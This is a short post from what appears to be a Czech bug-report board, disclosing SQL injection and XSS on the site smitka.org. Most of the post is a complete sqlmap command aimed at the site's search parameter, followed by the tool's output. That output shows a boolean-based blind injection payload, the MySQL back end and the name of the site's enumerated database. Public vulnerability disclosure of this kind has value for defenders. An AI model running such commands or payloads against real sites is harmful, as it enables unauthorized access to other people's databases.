smitka.org SQLi,XSS
BugTrack
| [link]
[link]
[link]
[link]
[link]
sqlmap -u "[link]" --threads=10 --dbs --random-agent --no-cast
---
Parameter: search (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=x%' AND 2335=2335 AND '%'='
---
back-end DBMS: MySQL 5
---
available databases [1]:
[*] smitka_web
(odpovědět) | lynt.cz | 2001:ba0:1800:91::* | 30.1.2020 0:54 |
|
|
|